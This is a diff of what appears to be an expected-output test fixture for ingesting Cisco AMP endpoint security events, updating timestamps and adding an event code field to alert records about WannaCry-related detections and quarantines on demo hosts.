                 "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6533671595485954000,\"timestamp\":1610623725,\"timestamp_nanoseconds\":899000000,\"date\":\"2021-01-14T11:28:45+00:00\",\"event_type\":\"Retrospective Detection\",\"event_type_id\":553648147,\"detection\":\"W32.FCE5B6784D-100.SBX.TG\",\"detection_id\":\"6533671595485954049\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"High\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_AMP_Exploit_Prevention_Audit\",\"external_ip\":\"8.8.8.8\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"d2:78:15:4a:f4:a2\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"pp32.exe\",\"file_path\":\"\\\\\\\\?\\\\C:\\\\pp32.exe\",\"identity\":{\"sha256\":\"fce5b6784dc9f44cdc1d6214bb7b68d3029db049dcaf734edc9660bb3373bc79\",\"sha1\":\"bdb11107a33eaeded6a838eb2a0e6167637dbe9c\",\"md5\":\"5df0c4ebca109779dc8afc745d612637\"}}}}",
+                "code": "553648147",
                 "kind": "alert",
                 "action": "Retrospective Detection",
                 "id": "6533671595485954000",
@@ -2099,8 +2125,9 @@
             },
             "event": {
                 "severity": 2,
-                "ingested": "2021-09-27T00:42:26.818527282Z",
+                "ingested": "2021-09-30T00:15:43.965543464Z",
                 "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419179222052372000,\"timestamp\":1610623598,\"timestamp_nanoseconds\":453000000,\"date\":\"2021-01-14T11:26:38+00:00\",\"event_type\":\"Quarantine Failure\",\"event_type_id\":2164260880,\"detection_id\":\"6419179222052372503\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"error\":{\"error_code\":3221225524,\"description\":\"Object name not found\"},\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"8.8.8.8\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"identity\":{\"sha256\":\"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa\"}}}}",
+                "code": "2164260880",
                 "kind": "alert",
                 "action": "Quarantine Failure",
                 "id": "6419179222052372000",
@@ -2186,8 +2213,9 @@
             },
             "event": {
                 "severity": 2,
-                "ingested": "2021-09-27T00:42:26.818529012Z",
+                "ingested": "2021-09-30T00:15:43.965545489Z",
                 "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419179222052372000,\"timestamp\":1610623598,\"timestamp_nanoseconds\":437000000,\"date\":\"2021-01-14T11:26:38+00:00\",\"event_type\":\"Threat Detected\",\"event_type_id\":1090519054,\"detection\":\"W32.File.MalParent\",\"detection_id\":\"6419179222052372503\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"8.8.8.8\",\"user\":\"user@testdomain.com\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"tasksche.exe\",\"file_path\":\"\\\\\\\\?\\\\C:\\\\ProgramData\\\\qzkbplcgew884\\\\tasksche.exe\",\"identity\":{\"sha256\":\"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa\"}}}}",
+                "code": "1090519054",
                 "kind": "alert",
                 "action": "Threat Detected",
                 "id": "6419179222052372000",
@@ -2259,8 +2287,9 @@
             },
             "event": {
                 "severity": 2,
-                "ingested": "2021-09-27T00:42:26.818530749Z",
+                "ingested": "2021-09-30T00:15:43.965547528Z",
                 "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419179217757405000,\"timestamp\":1610623597,\"timestamp_nanoseconds\":875000000,\"date\":\"2021-01-14T11:26:37+00:00\",\"event_type\":\"Quarantine Failure\",\"event_type_id\":2164260880,\"detection_id\":\"6419179217757405206\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"error\":{\"error_code\":3221225524,\"description\":\"Object name not found\"},\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"8.8.8.8\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"identity\":{\"sha256\":\"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa\"}}}}",
+                "code": "2164260880",
                 "kind": "alert",
                 "action": "Quarantine Failure",
                 "id": "6419179217757405000",
@@ -2334,8 +2363,9 @@
             },
             "event": {
                 "severity": 2,
-                "ingested": "2021-09-27T00:42:26.818532472Z",
+                "ingested": "2021-09-30T00:15:43.965549581Z",
                 "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419179217757405000,\"timestamp\":1610623597,\"timestamp_nanoseconds\":361000000,\"date\":\"2021-01-14T11:26:37+00:00\",\"event_type\":\"Quarantine Failure\",\"event_type_id\":2164260880,\"detection_id\":\"6419179213462437901\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"error\":{\"error_code\":3221225558,\"description\":\"Delete pending\"},\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"8.8.8.8\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"identity\":{\"sha256\":\"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa\"}}}}",
+                "code": "2164260880",
                 "kind": "alert",
                 "action": "Quarantine Failure",
                 "id": "6419179217757405000",
@@ -2409,8 +2439,9 @@
             },
             "event": {
                 "severity": 2,
-                "ingested": "2021-09-27T00:42:26.818534211Z",
+                "ingested": "2021-09-30T00:15:43.965551613Z",
                 "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419179217757405000,\"timestamp\":1610623597,\"timestamp_nanoseconds\":329000000,\"date\":\"2021-01-14T11:26:37+00:00\",\"event_type\":\"Quarantine Failure\",\"event_type_id\":2164260880,\"detection_id\":\"6419179204872503300\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"error\":{\"error_code\":3221225524,\"description\":\"Object name not found\"},\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"8.8.8.8\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"identity\":{\"sha256\":\"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa\"}}}}",
+                "code": "2164260880",
                 "kind": "alert",
                 "action": "Quarantine Failure",
                 "id": "6419179217757405000",
@@ -2496,8 +2527,9 @@
             },
             "event": {
                 "severity": 2,
-                "ingested": "2021-09-27T00:42:26.818535942Z",
+                "ingested": "2021-09-30T00:15:43.965553704Z",
                 "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419179217757405000,\"timestamp\":1610623597,\"timestamp_nanoseconds\":797000000,\"date\":\"2021-01-14T11:26:37+00:00\",\"event_type\":\"Threat Detected\",\"event_type_id\":1090519054,\"detection\":\"W32.File.MalParent\",\"detection_id\":\"6419179217757405206\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"8.8.8.8\",\"user\":\"user@testdomain.com\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"tasksche.exe\",\"file_path\":\"\\\\\\\\?\\\\C:\\\\ProgramData\\\\qzkbplcgew884\\\\tasksche.exe\",\"identity\":{\"sha256\":\"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa\"}}}}",
+                "code": "1090519054",
                 "kind": "alert",
                 "action": "Threat Detected",
                 "id": "6419179217757405000",
@@ -2569,8 +2601,9 @@
             },
             "event": {
                 "severity": 2,
-                "ingested": "2021-09-27T00:42:26.818537665Z",
+                "ingested": "2021-09-30T00:15:43.965555745Z",
                 "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419179217757405000,\"timestamp\":1610623597,\"timestamp_nanoseconds\":329000000,\"date\":\"2021-01-14T11:26:37+00:00\",\"event_type\":\"Threat Quarantined\",\"event_type_id\":553648143,\"detection_id\":\"6419179204872503298\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"8.8.8.8\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"identity\":{\"sha256\":\"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa\"}}}}",
+                "code": "553648143",
                 "kind": "alert",
                 "action": "Threat Quarantined",
                 "id": "6419179217757405000",
@@ -2640,8 +2673,9 @@
             },
             "event": {
                 "severity": 2,
-                "ingested": "2021-09-27T00:42:26.818539384Z",
+                "ingested": "2021-09-30T00:15:43.965557786Z",
                 "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419179217757405000,\"timestamp\":1610623597,\"timestamp_nanoseconds\":329000000,\"date\":\"2021-01-14T11:26:37+00:00\",\"event_type\":\"Threat Quarantined\",\"event_type_id\":553648143,\"detection_id\":\"6419179204872503301\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"8.8.8.8\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"identity\":{\"sha256\":\"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa\"}}}}",
+                "code": "553648143",
                 "kind": "alert",
                 "action": "Threat Quarantined",
                 "id": "6419179217757405000",
@@ -2723,8 +2757,9 @@
             },
             "event": {
                 "severity": 2,
-                "ingested": "2021-09-27T00:42:26.818541207Z",
+                "ingested": "2021-09-30T00:15:43.965559917Z",
                 "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419179213462438000,\"timestamp\":1610623596,\"timestamp_nanoseconds\":893000000,\"date\":\"2021-01-14T11:26:36+00:00\",\"event_type\":\"Threat Detected\",\"event_type_id\":1090519054,\"detection\":\"W32.File.MalParent\",\"detection_id\":\"6419179213462437902\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"8.8.8.8\",\"user\":\"user@testdomain.com\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"tasksche.exe\",\"file_path\":\"\\\\\\\\?\\\\C:\\\\ProgramData\\\\qzkbplcgew884\\\\tasksche.exe\",\"identity\":{\"sha256\":\"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa\"}}}}",
+                "code": "1090519054",
                 "kind": "alert",
                 "action": "Threat Detected",
                 "id": "6419179213462438000",
@@ -2812,8 +2847,9 @@
             },
             "event": {
                 "severity": 2,
-                "ingested": "2021-09-27T00:42:26.818542950Z",
+                "ingested": "2021-09-30T00:15:43.965561993Z",
                 "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419179213462438000,\"timestamp\":1610623596,\"timestamp_nanoseconds\":456000000,\"date\":\"2021-01-14T11:26:36+00:00\",\"event_type\":\"Threat Detected\",\"event_type_id\":1090519054,\"detection\":\"W32.File.MalParent\",\"detection_id\":\"6419179213462437899\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"8.8.8.8\",\"user\":\"user@testdomain.com\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"tasksche.exe\",\"file_path\":\"\\\\\\\\?\\\\C:\\\\ProgramData\\\\qzkbplcgew884\\\\tasksche.exe\",\"identity\":{\"sha256\":\"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa\",\"sha1\":\"5ff465afaabcbf0150d1a3ab2c2e74f3a4426467\",\"md5\":\"84c82835a5d21bbcf75a61706d8ab549\"}}}}",
+                "code": "1090519054",
                 "kind": "alert",
                 "action": "Threat Detected",
                 "id": "6419179213462438000",
@@ -2885,8 +2921,9 @@
             },
             "event": {
                 "severity": 2,
-                "ingested": "2021-09-27T00:42:26.818544687Z",
+                "ingested": "2021-09-30T00:15:43.965564068Z",
                 "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419179213462438000,\"timestamp\":1610623596,\"timestamp_nanoseconds\":643000000,\"date\":\"2021-01-14T11:26:36+00:00\",\"event_type\":\"Threat Quarantined\",\"event_type_id\":553648143,\"detection_id\":\"6419179204872503299\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"8.8.8.8\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"identity\":{\"sha256\":\"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa\"}}}}",
+                "code": "553648143",
                 "kind": "alert",
                 "action": "Threat Quarantined",
                 "id": "6419179213462438000",
@@ -2972,8 +3009,9 @@
             },
             "event": {
                 "severity": 2,
-                "ingested": "2021-09-27T00:42:26.818546406Z",
+                "ingested": "2021-09-30T00:15:43.965566175Z",
                 "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419179209167471000,\"timestamp\":1610623595,\"timestamp_nanoseconds\":957000000,\"date\":\"2021-01-14T11:26:35+00:00\",\"event_type\":\"Threat Detected\",\"event_type_id\":1090519054,\"detection\":\"W32.File.MalParent\",\"detection_id\":\"6419179209167470602\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"8.8.8.8\",\"user\":\"user@testdomain.com\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"tasksche.exe\",\"file_path\":\"\\\\\\\\?\\\\C:\\\\ProgramData\\\\qzkbplcgew884\\\\tasksche.exe\",\"identity\":{\"sha256\":\"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa\",\"sha1\":\"5ff465afaabcbf0150d1a3ab2c2e74f3a4426467\",\"md5\":\"84c82835a5d21bbcf75a61706d8ab549\"}}}}",
+                "code": "1090519054",
                 "kind": "alert",
                 "action": "Threat Detected",
                 "id": "6419179209167471000",
@@ -3061,8 +3099,9 @@
             },
             "event": {
                 "severity": 2,
-                "ingested": "2021-09-27T00:42:26.818548148Z",
+                "ingested": "2021-09-30T00:15:43.965568225Z",
                 "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419179209167471000,\"timestamp\":1610623595,\"timestamp_nanoseconds\":941000000,\"date\":\"2021-01-14T11:26:35+00:00\",\"event_type\":\"Threat Detected\",\"event_type_id\":1090519054,\"detection\":\"W32.ED01EBFBC9-100.SBX.TG\",\"detection_id\":\"6419179209167470598\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"8.8.8.8\",\"user\":\"user@testdomain.com\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"tasksche.exe\",\"file_path\":\"\\\\\\\\?\\\\C:\\\\ProgramData\\\\qzkbplcgew884\\\\tasksche.exe\",\"identity\":{\"sha256\":\"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa\",\"sha1\":\"5ff465afaabcbf0150d1a3ab2c2e74f3a4426467\",\"md5\":\"84c82835a5d21bbcf75a61706d8ab549\"}}}}",
+                "code": "1090519054",
                 "kind": "alert",
                 "action": "Threat Detected",
                 "id": "6419179209167471000",
@@ -3150,8 +3189,9 @@
             },
             "event": {
                 "severity": 2,
-                "ingested": "2021-09-27T00:42:26.818549864Z",
+                "ingested": "2021-09-30T00:15:43.965570286Z",
                 "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419179209167471000,\"timestamp\":1610623595,\"timestamp_nanoseconds\":941000000,\"date\":\"2021-01-14T11:26:35+00:00\",\"event_type\":\"Threat Detected\",\"event_type_id\":1090519054,\"detection\":\"W32.File.MalParent\",\"detection_id\":\"6419179209167470601\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"8.8.8.8\",\"user\":\"user@testdomain.com\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"tasksche.exe\",\"file_path\":\"\\\\\\\\?\\\\C:\\\\ProgramData\\\\qzkbplcgew884\\\\tasksche.exe\",\"identity\":{\"sha256\":\"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa\",\"sha1\":\"5ff465afaabcbf0150d1a3ab2c2e74f3a4426467\",\"md5\":\"84c82835a5d21bbcf75a61706d8ab549\"}}}}",
+                "code": "1090519054",
                 "kind": "alert",
                 "action": "Threat Detected",
                 "id": "6419179209167471000",
@@ -3248,8 +3288,9 @@
             },
             "event": {
                 "severity": 2,
-                "ingested": "2021-09-27T00:42:26.818551604Z",
+                "ingested": "2021-09-30T00:15:43.965572358Z",
                 "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419179209167471000,\"timestamp\":1610623595,\"timestamp_nanoseconds\":894000000,\"date\":\"2021-01-14T11:26:35+00:00\",\"event_type\":\"Threat Detected\",\"event_type_id\":1090519054,\"detection\":\"W32.ED01EBFBC9-100.SBX.TG\",\"detection_id\":\"6419179204872503300\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"8.8.8.8\",\"user\":\"user@testdomain.com\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"tasksche.exe\",\"file_path\":\"\\\\\\\\?\\\\C:\\\\WINDOWS\\\\tasksche.exe\",\"identity\":{\"sha256\":\"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa\",\"sha1\":\"5ff465afaabcbf0150d1a3ab2c2e74f3a4426467\",\"md5\":\"84c82835a5d21bbcf75a61706d8ab549\"},\"parent\":{\"process_id\":3020,\"disposition\":\"Malicious\",\"file_name\":\"mssecsvc.exe\",\"identity\":{\"sha256\":\"24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c\",\"sha1\":\"e889544aff85ffaf8b0d0da705105dee7c97fe26\",\"md5\":\"db349b97c37d22f5ea1d1841e3c89eb4\"}}}}}",
+                "code": "1090519054",
                 "kind": "alert",
                 "action": "Threat Detected",
                 "id": "6419179209167471000",
@@ -3346,8 +3387,9 @@
             },
             "event": {
                 "severity": 2,
